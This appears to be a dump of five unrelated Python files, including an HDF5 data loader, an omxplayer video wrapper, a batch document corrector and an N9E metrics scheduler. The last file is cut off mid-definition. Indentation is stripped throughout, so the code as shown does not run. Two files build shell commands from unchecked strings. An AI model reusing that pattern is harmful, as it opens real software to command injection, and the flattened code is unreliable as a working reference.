def Thread1(no):
print("Thread1 is created")
print("PID of Thread1 is : ",os.getpid())
for i in range(no):
sleep(1)
print("Thread-1 ",i)
def Thread2(no):
print("Thread2 is created")
print("PID of Thread2 is : ",os.getpid())
for i in range(no):
sleep(1)
print("Thread-2 ",i)
def main():
print("Inside main thread")
print("PID of main process is :",os.getpid())
print("PID of parent process of main is :",os.getppid())
value = 10
t1 = threading.Thread(target = Thread1, args = (value,))
t2 = threading.Thread(target = Thread2, args = (value,))
t1.start()
t2.start()
t1.join()
t2.join()
print("End of main thread")
if __name__ == "__main__":
main()
|
partial_dataset.py
|
"""
Tool for using a dataset which will not fit in memory with neural networks
"""
import math
import queue
import threading
import torch
import time
from torch.utils import data as torch_data
from typing import Callable, List, Iterator, Union
from ...core.communication import MPICommunication
from ...core.communication import MPI_WORLD
__all__ = ["PartialH5Dataset", "PartialH5DataLoaderIter"]
def queue_thread(q: queue.Queue):
while True:
items = q.get()
if isinstance(items, tuple):
func = items[0]
args = items[1:]
func(*args)
else:
items()
q.task_done()
class PartialH5Dataset(torch_data.Dataset):
"""
Create a Dataset object for a dataset which loads portions of data from an HDF5 file. Very similar to
:func:`heat.utils.data.datatools.Dataset`. This will create 2 threads, one for loading the data from the target file,
and one for converting items before being passed to the network. The conversion is done by the iterator.
A portion of the data of length ``initial_load`` is loaded upon initialization, the rest of the data is loaded
after the loaded data is returned by :func:`PartialH5DataLoaderIter`. This iterator will be used by the HeAT
:func:`heat.utils.data.datatools.DataLoader` automatically with this type of dataset.
Notes
-----
H5 datasets require the GIL to load data. This can be a bottleneck if data needs to be loaded multiple times (e.g.
the case for using this dataset). It is recommended to find another way to preprocess the data and avoid using
H5 files for this reason.
Parameters
----------
file: str
H5 file to use
comm: MPICommunication
Global MPI communicator generated by HeAT
dataset_names: Union[str, List[str]], optional
Name/s of dataset/s to load from ``file``. If a string is given, it will be the only dataset loaded.
Default is "data".
transforms : List[Callable], optional
Transforms to apply to the data after it is gotten from the loaded data before it is used by the network.
This should be a list of Callable torch functions for each item returned by the ``__getitem__`` function
of the individual dataset. If a list element is ``None`` then no transform will be applied to the
corresponding element returned by ``__getitem__``. I.e. if ``__getitem__`` returns an image and a label
then the list would look like this: ``transforms = [image_transforms, None]``. If this is ``None``, no
transforms will be applied to any elements. Default is ``None``.
use_gpu : bool, optional
Use GPUs if available. Defaults to True.
validate_set : bool, optional
Load the entire dataset onto each node upon initialization and skip loading in the iterator.
This is typically the case needed for validation sets when the network should be tested against the whole
dataset. Default is False.
initial_load : int, optional
How many elements to load from the file in the 0th dimension. Default is 7000 elements
load_length : int, optional
How many elements to load from the file in the iterator. Default is 1000 elements
"""
def __init__(
self,
file: str,
comm: MPICommunication = MPI_WORLD,
dataset_names: Union[str, List[str]] = "data",
transforms: List[Callable] = None,
use_gpu: bool = True,
validate_set: bool = False,
initial_load: int = 7000,
load_length: int = 1000,
): # noqa: D107
import h5py
super(PartialH5Dataset, self).__init__()
self.ishuffle = False
self.file = file
self.comm = comm
self.transforms = transforms if isinstance(transforms, (list, tuple)) else [transforms]
self.gpu = True if torch.cuda.device_count() > 0 and use_gpu else False
self.torch_device = "cpu"
if torch.cuda.is_available() and use_gpu:
dev_id = MPI_WORLD.rank % torch.cuda.device_count()
self.torch_device = torch.device("cuda:" + str(dev_id))
torch.cuda.set_device(dev_id)
f = h5py.File(file, "r")
# too much data for the process
fkeys = list(f.keys())
sz = f[fkeys[0]].len()
for k in fkeys[1:]:
# ensure that all of the datasets are the same length
if f[k].len() != sz:
raise ValueError(f"all datasets in {file} must be the same length")
self.total_size = sz
# how many indices will go onto each process (len)
self.lcl_full_sz = sz // comm.size
# load data that is half of the available memory
self.local_data_start = comm.rank * self.lcl_full_sz
self.local_data_end = (comm.rank + 1) * self.lcl_full_sz
if validate_set or initial_load > self.lcl_full_sz:
# if it's the validation set then load the whole dataset for each process
self.lcl_full_sz = sz
self.local_data_start = 0
self.local_data_end = sz
self.load_initial = sz
self.partial_dataset = False
self.load_len = 0
self.loads_needed = 0
else:
self.local_length = self.local_data_end - self.local_data_start
self.load_initial = initial_load
self.load_len = load_length # int(local_data_end / 3)
self.loads_needed = math.ceil(self.lcl_full_sz / self.load_len)
self.partial_dataset = True
self.loads_left = self.loads_needed
self.load_start = self.local_data_start
self.load_end = self.local_data_start + self.load_initial
# data being loaded from dataset_names parameter
if isinstance(dataset_names, str):
dataset_names = [dataset_names]
self.dataset_names = dataset_names
self.dataset_order = []
for d in dataset_names:
hld = f[d][self.load_start : self.load_end]
self.__setattr__(d, hld)
self.load_start = self.load_end
self.load_end += self.load_len
f.close()
self.load_thread = None
self.epoch_end = False
# need the number of loads required for an epoch
self.loading_queue = queue.Queue()
self.loading_condition = threading.Condition()
threading.Thread(target=queue_thread, args=[self.loading_queue], daemon=True).start()
self.convert_queue = queue.Queue()
threading.Thread(target=queue_thread, args=[self.convert_queue], daemon=True).start()
self.used_indices = []
def Shuffle(self):
"""
Send half of the local data to the process ``self.comm.rank + 1`` if available, else wrap around. After
receiving the new data, shuffle the local tensor.
Not implemented for partial dataset
"""
raise NotImplementedError
def Ishuffle(self):
"""
Send half of the local data to the process ``self.comm.rank + 1`` if available, else wrap around. After
receiving the new data, shuffle the local tensor.
Not implemented for partial dataset
"""
raise NotImplementedError
def __getitem__(self, index: Union[int, slice, List[int], torch.Tensor]) -> torch.Tensor:
"""
This should be defined by the user at runtime. This function needs to be designed such
that the data is in the 0th dimension and the indexes called are only in the 0th dim!
"""
raise NotImplementedError("__getitem__ must be overwritten")
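# Subclassing sketch (file name, dataset names, attribute names and transforms
# are assumptions): each name in dataset_names becomes an attribute holding the
# currently loaded chunk, and __getitem__ must index it only along dim 0:
#
#   class MyH5(PartialH5Dataset):
#       def __getitem__(self, index):
#           return self.data[index], self.labels[index]
#
#   ds = MyH5("train.h5", dataset_names=["data", "labels"],
#             transforms=[my_image_transform, None])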
def __len__(self) -> int:
"""
Get the total length of the dataset
"""
return self.total_size
def thread_replace_converted_batches(self):
"""
Replace the elements of the dataset with newly loaded elements. :func:'PartialH5DataLoaderIter' will
put the used indices in the ``used_indices`` parameter. This object is reset to an empty list after
these elements are overwritten with new data.
"""
import h5py
self.loads_left = self.loads_needed
ll = self.loads_left
for _ in range(ll):
with h5py.File(self.file, "r") as f:
for d in self.dataset_names:
hld = f[d][self.load_start : self.load_end]
self.__setattr__("hold" + d, hld)
if self.load_end + self.comm.size > self.total_size:
self.load_end = 0
self.load_start = self.load_end
self.load_end += self.load_len
# wait for lock1 *from* convert thread
with self.loading_condition:
self.loading_condition.wait()
for d in self.dataset_names:
new = self.__getattribute__("hold" + d)
dset = self.__getattribute__(d)
new_top = new[: len(self.used_indices)]
lnew = len(new_top)
dset[self.used_indices[:lnew]] = new_top
self.__setattr__(d, dset)
self.__setattr__("hold" + d, new[lnew:])
# give up lock / notify convert thread
self.used_indices = []
self.loads_left -= 1
class PartialH5DataLoaderIter(object):
"""
Iterator to be used with :func:'PartialH5Dataset'. It closely mirrors the standard torch iterator while loading
new data to replace the loaded batches automatically. It also pre-fetches the batches and begins their
preparation, collation, and device setting in the background.
"""
def __init__(self, loader): # noqa: D107
# todo: make note that h5py is required for this...move load to dataset?
self.dataset = loader.dataset
self._dataset_kind = loader.DataLoader._dataset_kind
self._IterableDataset_len_called = loader.DataLoader._IterableDataset_len_called
self._auto_collation = loader.DataLoader._auto_collation
self._drop_last = loader.DataLoader.drop_last
self._index_sampler = loader.DataLoader._index_sampler
self._num_workers = loader.DataLoader.num_workers
self._pin_memory = loader.DataLoader.pin_memory and torch.cuda.is_available()
self._timeout = loader.DataLoader.timeout
self._collate_fn = loader.DataLoader.collate_fn
self._sampler_iter = iter(self._index_sampler)
self._base_seed = torch.empty((), dtype=torch.int64).random_().item()
self._num_yielded = 0
self.batch_size = loader.DataLoader.batch_size
self.comm = self.dataset.comm
rand_samp_list = torch.randperm(self.dataset.load_initial).tolist()
# todo: support other samplers: for now it's only random
if self.dataset.partial_dataset:
self.ready_batches = []
mod_batch = self.dataset.load_len % self.batch_size
if mod_batch != 0:
self.dataset.load_len += self.batch_size - mod_batch
self.dataset.load_end = self.dataset.load_start + self.dataset.load_len
# generate all indices
index_list = []
idx_repeats = math.ceil(self.dataset.lcl_full_sz / self.dataset.load_initial)
for _ in range(idx_repeats):
index_list.extend(torch.randperm(self.dataset.load_initial).tolist())
# start the conversion
self.dataset.convert_queue.put((self.__thread_convert_all, index_list))
self.length = len(index_list) // self.batch_size
self.dataset.loading_queue.put(self.dataset.thread_replace_converted_batches)
else:
self.rand_samp_list = rand_samp_list
self.length = len(self._index_sampler)
self._dataset_fetcher = torch_data.dataloader._DatasetKind.create_fetcher(
self._dataset_kind,
loader.DataLoader.dataset,
self._auto_collation,
self._collate_fn,
self._drop_last,
)
def __len__(self):
"""
Get the length of the iterator
"""
return self.length
def _next_data(self):
# get the next batch
if not self.dataset.partial_dataset:
index = next(self._sampler_iter) # may raise StopIteration
data = self._dataset_fetcher.fetch(index) # may raise StopIteration
if self._pin_memory:
data = torch_data._utils.pin_memory.pin_memory(data)
return data
if self._num_yielded == self.__len__():
raise StopIteration
while len(self.ready_batches) < 1:
time.sleep(0.1)
batch = self.ready_batches.pop(0)
for b in range(len(batch)):
if batch[b].device != self.dataset.torch_device:
batch[b] = batch[b].to(self.dataset.torch_device)
return batch
def __next__(self):
"""
Get the next batch of data. Shamelessly taken from torch.
"""
# shamelessly taken from torch
data = self._next_data()
self._num_yielded += 1
# note: the warnings raised by torch for iterable datasets were removed here, look for these in
# the base class of the single process iterator
return data
def __iter__(self):
"""
Get a new iterator of this class
Returns
-------
PartialH5DataLoaderIter
"""
return self
def __thread_convert_all(self, index_list):
# convert all of the elements, collate them into batches, and send the batches to the correct device
# this function also communicates with the data loading thread from the PartialH5Dataset to notify it
# when it has the correct amount of data to write.
converted_items = []
for ind in index_list:
# get the desired image/target/... to begin composing a batch
single_item = self.dataset[ind]
if not isinstance(single_item, tuple) and self.dataset.transforms[0] is not None:
single_item = self.dataset.transforms[0](single_item)
if isinstance(single_item, tuple):
single_item = list(single_item)
for ii in range(len(single_item)):
# do transforms (have all torch stuff here)
if self.dataset.transforms[ii] is not None:
single_item[ii] = self.dataset.transforms[ii](single_item[ii])
converted_items.append(single_item)
self.dataset.used_indices.append(ind)
if len(converted_items) == self.batch_size:
if (
len(self.dataset.used_indices) == self.dataset.load_len
and self.dataset.loads_left > 0
):
with self.dataset.loading_condition:
self.dataset.loading_condition.notify()
batch = self._collate_fn(converted_items)
try:
for bb in range(2):
bb_batch = self.ready_batches[bb]
for b in range(len(batch)):
bb_batch[b] = bb_batch[b].to(self.dataset.torch_device)
self.ready_batches[bb] = bb_batch
except IndexError:
pass
self.ready_batches.append(batch)
converted_items = []
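# ------------------------------------------------------------------------------
# Hedged usage sketch (an illustration only, not part of the loader above): how
# an iterator like PartialH5DataLoaderIter is normally consumed. The loader and
# model arguments are hypothetical placeholders supplied by the caller.
# ------------------------------------------------------------------------------
def _example_partial_loader_loop(loader, model):
    # Each iteration yields a collated batch whose tensors were already moved to
    # loader.dataset.torch_device by the background convert thread.
    for batch in loader:
        inputs, targets = batch[0], batch[1]
        _ = model(inputs)  # forward pass only; loss/backward are omitted here
        _ = targets        # targets would feed a loss function in real code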
|
Video.py
|
# -*- coding: utf-8 -*-
# Copyright 2018-2019 oscillo
#
# Permission is hereby granted, free of charge,
# to any person obtaining a copy of this software
# and associated documentation files (the "Software"),
# to deal in the Software without restriction,
# including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission
# notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY
# OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
# LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import time
import subprocess
import os
import threading
import dbus
class Video:
def __init__(self):
# [[[ 1. Check ALSA Device ]]]
aplay = subprocess.Popen(
"aplay -L",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={'LANG':'C'},
shell=True
)
out, err = aplay.communicate()
aplayLines = out.decode("ascii", "ignore").splitlines()
self.alsa = False # True: ALSA device exists, False: it does not
for line in aplayLines:
if -1 != line.find("sndrpijustboomd"): # JustBoom DAC HAT
self.alsa = True
break
# [[[ 2. Initialize ]]]
# omxplayer command line
if not self.alsa:
self.start = "omxplayer --no-osd -b -o hdmi --vol "
else:
self.start = "omxplayer --no-osd -b -o alsa:plughw:1,0 --vol "
self.proc = None # omxplayer process
self.stopThread = None # stop thread
# Get HDMI or RCA
def GetCurrentAudioPort(self): # String (HDMI or RCA)
# [[[ 1. Check HW ]]]
if not self.alsa:
return "HDMI"
# [[[ 2. Check command line ]]]
if 0 < self.start.find("alsa"):
return "RCA"
else:
return "HDMI"
# Set HDMI or RCA
def SetCurrentAudioPort(
self, # instance
port # "HDMI" or "RCA"
): # None
# [[[ 1. Check HW ]]]
if not self.alsa:
return
# [[[ 2. Set command line ]]]
if 0 == port.find("HDMI"):
self.start = "omxplayer --no-osd -b -o hdmi --vol "
else:
self.start = "omxplayer --no-osd -b -o alsa:plughw:1,0 --vol "
# Open and Play Video
def Open(self,path,vol,audioNum, audioIndex) : # None
# [[[ 1. Make playing command ]]]
command = \
self.start \
+ str(vol) \
+ " -n " + str(audioIndex) + " \"" \
+ path + "\""
# [[[ 2. Execute for playing ]]]
self.proc = subprocess.Popen( \
command, \
shell=True, \
stdin=subprocess.PIPE)
# [[[ 3. Initialize Audio Stream Switching ]]]
self.audioNum = audioNum
self.audioStream = audioIndex - 1
self.vol = vol
# [[[ 4. D-Bus ]]]
flag = True
while flag:
try:
while not os.path.exists("/tmp/omxplayerdbus.root"):
if self.proc.poll() is not None:
# < omxplayer has terminated >
self.proc = None
return
time.sleep(0.05)
time.sleep(0.05)
if self.proc.poll() is not None:
# < omxplayer has terminated >
self.proc = None
return
dbusAddress = open("/tmp/omxplayerdbus.root", "r")
self.bus = dbus.bus.BusConnection(dbusAddress.readline()[0:-1])
dbusAddress.close()
self.proxy = self.bus.get_object(
'org.mpris.MediaPlayer2.omxplayer',
'/org/mpris/MediaPlayer2',
introspect=False)
self.root_interface = dbus.Interface(
self.proxy,
'org.mpris.MediaPlayer2')
self.player_interface = dbus.Interface(
self.proxy,
'org.mpris.MediaPlayer2.Player')
self.properties_interface = dbus.Interface(
self.proxy,
'org.freedesktop.DBus.Properties')
flag = False
except:
pass
# Check whether playback is still running
def CheckPlaying(self) : # Bool True(Playing) / False(Stop)
if self.proc is not None:
# < omxplayer is running >
if self.proc.poll() is not None:
# < omxplayer has terminated >
self.proc = None
return False
else:
# < omxplayer is running >
return True
else:
# < omxplayer is not running >
return False
# Fade Stop Playing Video
def FadeStopThread(self) : # None
try:
# < omxplayer is running >
# [[[ 1. volume down ]]]
for i in range(15):
self.DownVolume()
time.sleep(0.2)
# [[[ 2. exit omxplayer ]]]
self.root_interface.Quit()
# [[[ 3. Terminate omxplayer ]]]
self.proc = None
except:
pass
# Stop Playing Video
def Stop(self) : # None
# [[[ 1. Create thread that fades the volume and stops in the background ]]]
self.stopThread = threading.Thread(target=self.FadeStopThread)
self.stopThread.start()
# Pause Video
def Pause(self) : # None
try:
self.player_interface.PlayPause()
except:
pass
# Switch Audio
def SwitchAudio(self) : # None
# [[[ 1. Check audio number ]]]
if 1 == self.audioNum:
return
# [[[ 2. Change audio stream ]]]
self.audioStream = self.audioStream + 1
if self.audioNum == self.audioStream:
# [[ 2.1. wrap back to the first audio stream ]]
self.audioStream = 0
try:
self.player_interface.SelectAudio(self.audioStream)
# [[[ 3. Seek so the audio change takes effect immediately ]]]
self.player_interface.Seek(dbus.types.Int64(1))
except:
pass
# Position
def Position(self) : # [sec]
return int(self.properties_interface.Get(
self.player_interface.dbus_interface,
"Position"
) / 1000000)
# Rewind
def Rewind(self) : # None
try:
self.player_interface.Seek(dbus.types.Int64(1000*1000*(-5)))
except:
pass
# Fast Forward
def FastForward(self) : # None
try:
self.player_interface.Seek(dbus.types.Int64(1000*1000*(5)))
except:
pass
# Down Volume
def DownVolume(self) : # None
self.vol = self.vol - 300
try:
self.properties_interface.Set(
self.player_interface.dbus_interface,
"Volume",
pow(10,self.vol/2000.0)
)
except:
pass
# Up Volume
def UpVolume(self) : # None
self.vol = self.vol + 300
try:
self.properties_interface.Set(
self.player_interface.dbus_interface,
"Volume",
pow(10,self.vol/2000.0)
)
except:
pass
# Default Volume
def GetDefaultVolume(self): # Integer [dB]
return -4500
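# Hedged usage sketch (not part of the original class): a typical way to drive
# this player. The media path is hypothetical. Note that omxplayer volumes are
# given in millibels, which is why GetDefaultVolume() returns -4500 (-45 dB),
# Up/DownVolume step by 300 (3 dB), and the D-Bus "Volume" property is set to
# the linear factor pow(10, vol / 2000.0).
def _example_playback():
    video = Video()
    video.SetCurrentAudioPort("HDMI")
    video.Open("/home/pi/videos/sample.mp4", video.GetDefaultVolume(), 1, 1)
    time.sleep(10)              # let it play for a while
    if video.CheckPlaying():
        video.Stop()            # fades the volume down, then quits omxplayer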
|
corrector_batch.py
|
import multiprocessing
import queue
import time
import traceback
from . import database_manager
from . import document_manager
from .corrector_worker import CorrectorWorker
from .logger_manager import LoggerManager
class CorrectorBatch:
def __init__(self, settings):
self.settings = settings
def run(self, process_dict):
"""
The run method fetches data and initializes corrector workers.
:param process_dict:
:return:
"""
try:
self._batch_run(process_dict)
except Exception as e:
# Catch internal exceptions to log
logger_m = LoggerManager(self.settings.LOGGER_NAME, self.settings.MODULE)
msg = "Error: {0} {1}".format(repr(e), traceback.format_exc()).replace("\n", "")
logger_m.log_error('corrector_batch_run', msg)
# Raise exception again
raise e
def _batch_run(self, process_dict):
"""
Gets raw documents, groups by "messageId", corrects documents' structure, initializes workers,
updates timeout documents to "done", removes duplicates from raw_messages.
:param process_dict:
:return: None. The number of documents handled is written to process_dict['doc_len'].
"""
doc_len = 0
start_processing_time = time.time()
logger_m = LoggerManager(self.settings.LOGGER_NAME, self.settings.MODULE)
logger_m.log_heartbeat(
"processing", self.settings.HEARTBEAT_LOGGER_PATH, self.settings.HEARTBEAT_FILE, "SUCCEEDED")
logger_m.log_info('corrector_batch_start', 'Starting corrector - Version {0}'.format(LoggerManager.__version__))
# Start Database Manager
db_m = database_manager.DatabaseManager(self.settings)
# Start Document Manager
doc_m = document_manager.DocumentManager(self.settings)
# Get documents from raw collection
cursor = db_m.get_raw_documents(limit=self.settings.CORRECTOR_DOCUMENTS_LIMIT)
logger_m.log_info('corrector_batch_raw', 'Processing {0} raw documents'.format(len(cursor)))
# Aggregate documents by message id
# Correct missing fields
doc_map = {}
for _doc in cursor:
message_id = _doc.get('messageId', '')
if message_id not in doc_map:
doc_map[message_id] = []
fix_doc = doc_m.correct_structure(_doc)
doc_map[message_id].append(fix_doc)
# Build queue to be processed
list_to_process = multiprocessing.Queue()
duplicates = multiprocessing.Value('i', 0, lock=True)
m = multiprocessing.Manager()
to_remove_queue = m.Queue()
for message_id in doc_map:
documents = doc_map[message_id]
data = dict()
data['logger_manager'] = logger_m
data['document_manager'] = doc_m
data['message_id'] = message_id
data['documents'] = documents
data['to_remove_queue'] = to_remove_queue
list_to_process.put(data)
doc_len += len(documents)
# Sync
# time.sleep(5)
# Create pool of workers
pool = []
for i in range(self.settings.THREAD_COUNT):
# Configure worker
worker = CorrectorWorker(self.settings, 'worker_{0}'.format(i))
p = multiprocessing.Process(target=worker.run, args=(list_to_process, duplicates))
pool.append(p)
# Start all pool processes
for p in pool:
p.start()
# Wait for all processes to finish their jobs
for p in pool:
p.join()
logger_m.log_info('corrector_batch_update_timeout',
"Updating timed out [{0} days] orphans to done.".format(self.settings.CORRECTOR_TIMEOUT_DAYS))
# Update Status of older documents according to client.requestInTs
cursor = db_m.get_timeout_documents_client(self.settings.CORRECTOR_TIMEOUT_DAYS,
limit=self.settings.CORRECTOR_DOCUMENTS_LIMIT)
list_of_docs = list(cursor)
number_of_updated_docs = db_m.update_old_to_done(list_of_docs)
if number_of_updated_docs > 0:
logger_m.log_info('corrector_batch_update_client_old_to_done',
"Total of {0} orphans from Client updated to status 'done'.".format(number_of_updated_docs))
else:
logger_m.log_info('corrector_batch_update_client_old_to_done',
"No orphans updated to done.")
doc_len += number_of_updated_docs
# Update Status of older documents according to producer.requestInTs
cursor = db_m.get_timeout_documents_producer(self.settings.CORRECTOR_TIMEOUT_DAYS,
limit=self.settings.CORRECTOR_DOCUMENTS_LIMIT)
list_of_docs = list(cursor)
number_of_updated_docs = db_m.update_old_to_done(list_of_docs)
if number_of_updated_docs > 0:
logger_m.log_info('corrector_batch_update_producer_old_to_done',
"Total of {0} orphans from Producer updated to status 'done'.".format(number_of_updated_docs))
else:
logger_m.log_info('corrector_batch_update_producer_old_to_done',
"No orphans updated to done.")
doc_len += number_of_updated_docs
# Go through the to_remove list and remove the duplicates
element_in_queue = True
total_raw_removed = 0
while element_in_queue:
try:
element = to_remove_queue.get(False)
db_m.remove_duplicate_from_raw(element)
total_raw_removed += 1
except queue.Empty:
element_in_queue = False
if total_raw_removed > 0:
logger_m.log_info('corrector_batch_remove_duplicates_from_raw',
"Total of {0} duplicate documents removed from raw messages.".format(total_raw_removed))
else:
logger_m.log_info('corrector_batch_remove_duplicates_from_raw',
"No raw documents marked to removal.")
doc_len += total_raw_removed
end_processing_time = time.time()
total_time = time.strftime("%H:%M:%S", time.gmtime(end_processing_time - start_processing_time))
msg = ["Number of duplicates: {0}".format(duplicates.value),
"Documents processed: " + str(doc_len),
"Processing time: {0}".format(total_time)]
logger_m.log_info('corrector_batch_end', ' | '.join(msg))
logger_m.log_heartbeat(
"finished", self.settings.HEARTBEAT_LOGGER_PATH, self.settings.HEARTBEAT_FILE, "SUCCEEDED")
process_dict['doc_len'] = doc_len
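# Hedged sketch (illustration only, not used by the batch): the queue plus
# worker-pool pattern that _batch_run relies on, reduced to its essentials.
# The _example_* names are hypothetical; _example_pool_worker stands in for
# CorrectorWorker.run.
def _example_pool_worker(job_queue, counter):
    # Drain the shared queue, counting handled jobs; stop once it runs dry.
    while True:
        try:
            job_queue.get(timeout=1)
        except queue.Empty:
            break
        with counter.get_lock():
            counter.value += 1
def _example_worker_pool(job_count=10, worker_count=2):
    job_queue = multiprocessing.Queue()
    for i in range(job_count):
        job_queue.put({'message_id': i})
    counter = multiprocessing.Value('i', 0, lock=True)
    pool = [multiprocessing.Process(target=_example_pool_worker, args=(job_queue, counter))
            for _ in range(worker_count)]
    for p in pool:
        p.start()
    for p in pool:
        p.join()
    return counter.value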
|
vegaops2n9e.py
|
# -*- coding: UTF-8 -*-
import json
import logging
import os
import re
import requests
import schedule
import sys
import threading
import time
import yaml
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('VegaOps2N9e')
reload(sys)
sys.setdefaultencoding('utf8')
def _push_metrics(cfg, metrics):
headers = {
"X-User-Token": cfg.get('token'),
"Content-Type": "Application/json"
}
url = cfg.get('url', {}).get('base')
if not url:
raise Exception("N9E URL could not be empty.")
uri = url + '/api/transfer/push'
resp = requests.post(uri, headers=headers, data=json.dumps(metrics))
if resp.status_code not in [200, 201]:
logger.error(resp.text)
raise Exception("Bad request status[%s] for "
"%s" % (resp.status_code, uri))
cont = resp.json()
if cont.get('err'):
logger.error(resp.text)
def _register_resource(cfg, resource):
headers = {
"X-User-Token": cfg.get('token'),
"Content-Type": "Application/json"
}
url = cfg.get('url', {}).get('rdb')
if not url:
raise Exception("N9E URL could not be empty.")
uri = url + '/v1/rdb/resources/register'
resp = requests.post(uri, headers=headers, data=json.dumps(resource))
if resp.status_code not in [200, 201]:
logger.error(resp.text)
raise Exception("Bad request status[%s] for "
"%s" % (resp.status_code, uri))
cont = resp.json()
if cont.get('err'):
logger.error(resp.text)
def _build_item(item, key):
if not isinstance(key, (str, unicode)):
return key
if key.startswith('vm.'):
return item.get(key[3:])
return key
def _build_metrics(res, target):
metrics = []
for item in res:
metric = {}
for key in target:
if isinstance(target[key], (dict, list)):
tmp = {}
for kk in target[key]:
val = _build_item(item, target[key][kk])
tmp[kk] = val
metric[key] = json.dumps(tmp)
else:
val = _build_item(item, target[key])
metric[key] = val
metrics.append(metric)
return metrics
def _build_resources(res, target):
resources = []
for item in res:
resource = {}
for key in target:
if isinstance(target[key], (dict, list)):
tmp = {}
for kk in target[key]:
val = _build_item(item, target[key][kk])
tmp[kk] = val
resource[key] = json.dumps(tmp)
else:
val = _build_item(item, target[key])
resource[key] = val
resources.append(resource)
return resources
def _job(n9e, polling):
if polling.get('type', 'resource') == 'resource':
_job_resource(n9e, polling)
elif polling.get('type', 'resource') == 'metric':
_job_metric(n9e, polling)
def _job_metric(n9e, polling):
if not os.path.exists('./tasks'):
os.system('mkdir -p ./tasks')
regions = polling.get('regions', [])
for region in regions:
task = "%s_%s" % (polling.get('task'), region.get('name'))
logger.info("Start to run task: %s" % task)
task_file = './tasks/Task-%s.yaml' % task
output_dir = './tasks/%s' % task
task_d = {
"componentId": task,
"credentials": polling.get('credentials', {}),
"vendor": polling.get('vendor'),
"version": polling.get('version'),
"nodes": polling.get('nodes', [])
}
task_d['credentials']['regionId'] = region.get('name')
try:
fd = open(task_file, "w")
yaml.dump(task_d, fd)
except Exception as e:
logger.error("Failed to create task file %s" % task)
if not os.path.exists(output_dir):
os.system('mkdir %s' % output_dir)
os.system('/opt/vegaops/bin/vegaops %s %s' % (task_file, output_dir))
output = '%s/out.yaml' % output_dir
if not os.path.isfile(output):
logger.error("Could not find output file %s" % output)
return
try:
out = yaml.safe_load(open(output, 'r').read())
except Exception as e:
logger.error("Failed to load output as %s" % e)
return
for node in polling.get('nodes', []):
target = node.get('target')
component = node.get('componentId')
if component not in out:
continue
if not out[component].get('success'):
continue
dt = out[component].get('resultType')
if not dt.startswith('list:'):
continue
metrics = _build_metrics(
out[component].get(dt[5:], []), target)
if not len(metrics):
continue
_push_metrics(n9e, metrics)
def _job_resource(n9e, polling):
if not os.path.exists('./tasks'):
os.system('mkdir -p ./tasks')
regions = polling.get('regions', [])
for region in regions:
task = "%s_%s" % (polling.get('task'), region.get('name'))
logger.info("Start to run task: %s" % task)
task_file = './tasks/Task-%s.yaml' % task
output_dir = './tasks/%s' % task
task_d = {
"componentId": task,
"credentials": polling.get('credentials', {}),
"vendor": polling.get('vendor'),
"version": polling.get('version'),
"nodes": polling.get('nodes', [])
}
task_d['credentials']['regionId'] = region.get('name')
if not os.path.isfile(task_file):
try:
fd = open(task_file, "w")
yaml.dump(task_d, fd)
except Exception as e:
logger.error("Failed to create task file %s" % task)
if not os.path.exists(output_dir):
os.system('mkdir %s' % output_dir)
os.system('/opt/vegaops/bin/vegaops %s %s' % (task_file, output_dir))
output = '%s/out.yaml' % output_dir
if not os.path.isfile(output):
logger.error("Could not find output file %s" % output)
return
try:
out = yaml.safe_load(open(output, 'r').read())
except Exception as e:
logger.error("Failed to load output as %s" % e)
return
for node in polling.get('nodes', []):
target = node.get('target')
component = node.get('componentId')
if component not in out:
continue
if not out[component].get('success'):
continue
dt = out[component].get('resultType')
if not dt.startswith('list:'):
continue
resources = _build_resources(
out[component].get(dt[5:], []), target)
if not len(resources):
continue
_register_resource(n9e, resources)
def _run_threaded(cfg):
job_thread = threading.Thread(
target=cfg['func'], args=(cfg['n9e'], cfg['job']))
job_thread.start()
def _load_jobs(config):
pollings = config.get('pollings', [])
for polling in pollings:
cfg = {
'n9e': config.get('n9e', {}),
'job': polling,
'func': _job
}
schedule.every(
polling.get('interval', 1800)).seconds.do(_run_threaded, cfg)
# _job(cfg['n9e'], cfg['job'])
def cron_job(config):
_load_jobs(config)
while True:
schedule.run_pending()
time.sleep(1)
def once_job(config):
pass
def main():
argv = sys.argv
config_path = "./config.yaml"
_type = 'cron'
if len(argv) <= 1:
logger.info("Use %s as config file" % config_path)
else:
config_path = argv[1]
if not os.path.isfile(config_path):
logger.error("Could not find file %s" % config_path)
sys.exit(1)
if len(argv) >= 3:
_type = argv[2]
try:
config = yaml.safe_load(open(config_path, 'r').read())
except Exception as e:
logger.error("Faild to load config file as "
"error %s" % e)
raise e
if _type == 'cron':
cron_job(config)
elif _type == 'once':
once_job(config)
else:
logger.error("Bad job type %s, only support "
"cron, once job" % _type)
sys.exit(1)
if __name__ == "__main__":
main()
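# ------------------------------------------------------------------------------
# Hedged illustration (all values below are hypothetical): the configuration
# layout this script expects, expressed as the Python dict that yaml.safe_load
# would return for config.yaml.
# ------------------------------------------------------------------------------
_EXAMPLE_CONFIG = {
    'n9e': {
        'token': 'example-user-token',
        'url': {
            'base': 'http://n9e.example.com',     # used by _push_metrics
            'rdb': 'http://n9e-rdb.example.com',  # used by _register_resource
        },
    },
    'pollings': [{
        'type': 'resource',            # 'resource' or 'metric'
        'task': 'ecs_inventory',
        'interval': 1800,              # seconds between scheduled runs
        'vendor': 'examplecloud',
        'version': 'v1',
        'credentials': {'accessKeyId': 'xxx', 'accessKeySecret': 'xxx'},
        'regions': [{'name': 'region-1'}],
        'nodes': [{
            'componentId': 'ecs',
            # values prefixed with "vm." are looked up on each result item;
            # anything else is copied through literally (see _build_item)
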